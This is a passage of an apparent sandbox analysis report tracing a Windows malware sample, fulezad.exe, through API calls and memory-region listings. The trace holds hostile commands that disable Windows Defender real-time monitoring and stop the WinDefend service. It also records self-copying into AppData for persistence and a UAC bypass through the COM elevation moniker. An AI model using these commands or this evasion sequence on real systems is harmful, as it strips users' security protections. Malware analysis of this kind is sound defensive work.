szExeFile="sppsvc.exe")) returned 1 [0104.291] lstrcmpiW (lpString1="sppsvc.exe", lpString2="MSASCui.exe") returned 1 [0104.291] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0104.294] lstrcmpiW (lpString1="svchost.exe", lpString2="MSASCui.exe") returned 1 [0104.294] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x8e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fulezad.exe")) returned 1 [0104.295] lstrcmpiW (lpString1="fulezad.exe", lpString2="MSASCui.exe") returned -1 [0104.295] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x8bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0104.296] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCui.exe") returned -1 [0104.296] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x8bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0104.297] lstrcmpiW (lpString1="cmd.exe", lpString2="MSASCui.exe") returned -1 [0104.297] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0104.298] lstrcmpiW (lpString1="conhost.exe", lpString2="MSASCui.exe") returned -1 [0104.298] Process32NextW (in: hSnapshot=0xec, lppe=0x18adc4 | out: lppe=0x18adc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0104.298] CloseHandle (hObject=0xec) returned 1 [0104.298] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32\\", lpStartupInfo=0x18afa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18af94 | out: lpCommandLine="/c powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessInformation=0x18af94*(hProcess=0xe4, hThread=0xec, dwProcessId=0x900, dwThreadId=0x8fc)) returned 1 [0104.304] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", ulOptions=0x0, samDesired=0x102, phkResult=0x18afec | out: phkResult=0x18afec*=0x0) returned 0x2 [0104.304] RegSetValueExW (hKey=0x0, lpValueName="DisableAntiSpyware", Reserved=0x0, dwType=0x4, lpData=0x18afe8, cbData=0x4) returned 0x6 [0104.304] RegCloseKey (hKey=0x0) returned 0x6 [0104.304] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Defender Security Center\\Notifications", ulOptions=0x0, samDesired=0x102, phkResult=0x18afec | out: phkResult=0x18afec*=0x0) returned 0x2 [0104.304] RegSetValueExW (hKey=0x0, lpValueName="DisableNotifications", Reserved=0x0, dwType=0x4, lpData=0x18afe8, cbData=0x4) returned 0x6 [0104.304] RegCloseKey (hKey=0x0) returned 0x6 [0104.305] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x2823e0 [0104.308] OpenServiceW (hSCManager=0x2823e0, lpServiceName="MBAMService", dwDesiredAccess=0x4) returned 0x0 [0104.308] CloseServiceHandle (hSCObject=0x2823e0) returned 1 [0104.309] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x2823e0 [0104.309] OpenServiceW (hSCManager=0x2823e0, lpServiceName="SAVService", dwDesiredAccess=0x4) returned 0x0 [0104.309] CloseServiceHandle (hSCObject=0x2823e0) returned 1 [0104.309] GetNativeSystemInfo (in: lpSystemInfo=0x18b204 | out: lpSystemInfo=0x18b204*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0104.309] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18ad90, nSize=0x104 | out: lpFilename="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fulezad.exe")) returned 0x30 [0104.309] GetCurrentProcess () returned 0xffffffff [0104.309] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18a904 | out: TokenHandle=0x18a904*=0xf0) returned 1 [0104.309] GetTokenInformation (in: TokenHandle=0xf0, TokenInformationClass=0x1, TokenInformation=0x18a908, TokenInformationLength=0x4c, ReturnLength=0x18a8f0 | out: TokenInformation=0x18a908, ReturnLength=0x18a8f0) returned 1 [0104.309] AllocateAndInitializeSid (in: pIdentifierAuthority=0x18a8fc, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x18a8f8 | out: pSid=0x18a8f8*=0x291dd0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0104.309] EqualSid (pSid1=0x18a910*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68)), pSid2=0x291dd0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0 [0104.310] CloseHandle (hObject=0xf0) returned 1 [0104.310] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x18a978 | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0104.312] lstrcmpiW (lpString1="C:\\Users\\aETAdzjz\\AppData\\Local\\T", lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned -1 [0104.312] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\*", lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 0x291810 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.312] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 1 [0104.313] FindNextFileW (in: hFindFile=0x291810, lpFindFileData=0x18a2f4 | out: lpFindFileData=0x18a2f4) returned 0 [0104.313] FindClose (in: hFindFile=0x291810 | out: hFindFile=0x291810) returned 1 [0104.313] CreateDirectoryW (lpPathName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem"), lpSecurityAttributes=0x0) returned 1 [0104.314] CopyFileW (lpExistingFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\fulezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\fulezad.exe"), lpNewFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\fumezad.exe"), bFailIfExists=0) returned 1 [0104.328] GetCurrentProcess () returned 0xffffffff [0104.328] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18a940 | out: TokenHandle=0x18a940*=0xf8) returned 1 [0104.328] NtQueryInformationToken (in: TokenHandle=0xf8, TokenInformationClass=0x12, TokenInformation=0x18a950, TokenInformationLength=0x4, ReturnLength=0x18a938 | out: TokenInformation=0x18a950, ReturnLength=0x18a938) returned 0x0 [0104.328] CloseHandle (hObject=0xf8) returned 1 [0104.328] GetWindowsDirectoryW (in: lpBuffer=0x18a528, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0104.328] lstrcatW (in: lpString1="C:\\Windows", lpString2="\\" | out: lpString1="C:\\Windows\\") returned="C:\\Windows\\" [0104.328] lstrcatW (in: lpString1="C:\\Windows\\", lpString2="explorer.exe" | out: lpString1="C:\\Windows\\explorer.exe") returned="C:\\Windows\\explorer.exe" [0104.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x429581*=0x0, ZeroBits=0x0, RegionSize=0x18a524*=0x1000, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x429581*=0x250000, RegionSize=0x18a524*=0x1000) returned 0x0 [0104.328] lstrcpyW (in: lpString1=0x250000, lpString2="C:\\Windows\\explorer.exe" | out: lpString1="C:\\Windows\\explorer.exe") returned="C:\\Windows\\explorer.exe" [0104.328] RtlInitUnicodeString (in: DestinationString=0x271420, SourceString="C:\\Windows\\explorer.exe" | out: DestinationString="C:\\Windows\\explorer.exe") [0104.328] RtlInitUnicodeString (in: DestinationString=0x271428, SourceString="bloody booty bla de bludy botty bla lhe capitaine bloode!" | out: DestinationString="bloody booty bla de bludy botty bla lhe capitaine bloode!") [0104.328] LdrEnumerateLoadedModules () returned 0x0 [0104.328] RtlInitUnicodeString (in: DestinationString=0x27289c, SourceString="C:\\Windows\\explorer.exe" | out: DestinationString="C:\\Windows\\explorer.exe") [0104.328] RtlInitUnicodeString (in: DestinationString=0x2728a4, SourceString="explorer.exe" | out: DestinationString="explorer.exe") [0104.328] Sleep (dwMilliseconds=0x1f4) [0104.852] CoInitialize (pvReserved=0x0) returned 0x0 [0105.211] IIDFromString (in: lpsz="{6EDD6D74-C007-4E75-B76A-E5740995E24C}", lpiid=0x18a920 | out: lpiid=0x18a920) returned 0x0 [0105.212] CLSIDFromString (in: lpsz="{3E5FC7F9-9A51-4367-9063-A120244FBEC7}", pclsid=0x18a934 | out: pclsid=0x18a934*(Data1=0x3e5fc7f9, Data2=0x9a51, Data3=0x4367, Data4=([0]=0x90, [1]=0x63, [2]=0xa1, [3]=0x20, [4]=0x24, [5]=0x4f, [6]=0xbe, [7]=0xc7))) returned 0x0 [0105.212] lstrlenW (lpString="{3E5FC7F9-9A51-4367-9063-A120244FBEC7}") returned 38 [0105.212] lstrcpyW (in: lpString1=0x18a470, lpString2="{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" | out: lpString1="{3E5FC7F9-9A51-4367-9063-A120244FBEC7}") returned="{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" [0105.212] lstrcpyW (in: lpString1=0x18a4f0, lpString2="Elevation:Administrator!new:" | out: lpString1="Elevation:Administrator!new:") returned="Elevation:Administrator!new:" [0105.212] lstrcatW (in: lpString1="Elevation:Administrator!new:", lpString2="{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" | out: lpString1="Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}") returned="Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}" [0105.212] CoGetObject (in: pszName="Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}", pBindOptions=0x18a444, riid=0x18a920*(Data1=0x6edd6d74, Data2=0xc007, Data3=0x4e75, Data4=([0]=0xb7, [1]=0x6a, [2]=0xe5, [3]=0x74, [4]=0x9, [5]=0x95, [6]=0xe2, [7]=0x4c)), ppv=0x18a91c | out: ppv=0x18a91c*=0x292894) returned 0x0 [0110.171] ObjectStublessClient9 () [0110.505] IUnknown:Release (This=0x292894) returned 0x0 [0110.707] ExitProcess (uExitCode=0x0) Thread: id = 107 os_tid = 0x918 Thread: id = 118 os_tid = 0x8d8 Thread: id = 119 os_tid = 0x8c8 Thread: id = 120 os_tid = 0x8cc Process: id = "6" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3df85000" os_pid = "0x924" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x8bc" cmd_line = "/c sc stop WinDefend" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1355 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1356 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1357 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1358 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1359 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1360 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1361 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1362 start_va = 0x4a550000 end_va = 0x4a59bfff entry_point = 0x4a550000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1363 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1364 start_va = 0x777c0000 end_va = 0x7793ffff entry_point = 0x777c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1365 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1366 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1367 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1368 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1369 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1370 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1371 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1438 start_va = 0x5d0000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 1439 start_va = 0x750d0000 end_va = 0x7512bfff entry_point = 0x750d0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1440 start_va = 0x75240000 end_va = 0x7527efff entry_point = 0x75240000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1441 start_va = 0x752b0000 end_va = 0x752b7fff entry_point = 0x752b0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1591 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1592 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1593 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1594 start_va = 0x840000 end_va = 0x93ffff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 1595 start_va = 0x75280000 end_va = 0x75286fff entry_point = 0x75280000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 1596 start_va = 0x75310000 end_va = 0x7531bfff entry_point = 0x75310000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1597 start_va = 0x75320000 end_va = 0x7537ffff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1598 start_va = 0x75390000 end_va = 0x7542ffff entry_point = 0x75390000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1599 start_va = 0x75510000 end_va = 0x75519fff entry_point = 0x75510000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1600 start_va = 0x755d0000 end_va = 0x7565ffff entry_point = 0x755d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1601 start_va = 0x758f0000 end_va = 0x759dffff entry_point = 0x758f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1602 start_va = 0x759f0000 end_va = 0x75a08fff entry_point = 0x759f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1603 start_va = 0x75b60000 end_va = 0x75bfcfff entry_point = 0x75b60000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1604 start_va = 0x75c00000 end_va = 0x75cabfff entry_point = 0x75c00000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1605 start_va = 0x76110000 end_va = 0x76155fff entry_point = 0x76110000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1606 start_va = 0x76380000 end_va = 0x7647ffff entry_point = 0x76380000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1607 start_va = 0x76540000 end_va = 0x7664ffff entry_point = 0x76540000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1608 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 1609 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x0 region_type = private name = "private_0x00000000774e0000" filename = "" Region: id = 1610 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1611 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1612 start_va = 0x3e0000 end_va = 0x567fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1613 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 1614 start_va = 0x75430000 end_va = 0x754fbfff entry_point = 0x75430000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1615 start_va = 0x75cb0000 end_va = 0x75d0ffff entry_point = 0x75cb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1616 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1617 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1618 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1619 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1620 start_va = 0x650000 end_va = 0x7d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Region: id = 1621 start_va = 0x940000 end_va = 0x1d3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 1622 start_va = 0x1d40000 end_va = 0x2082fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d40000" filename = "" Region: id = 1624 start_va = 0x2090000 end_va = 0x235efff entry_point = 0x2090000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 108 os_tid = 0x920 [0105.881] GetSystemTimeAsFileTime 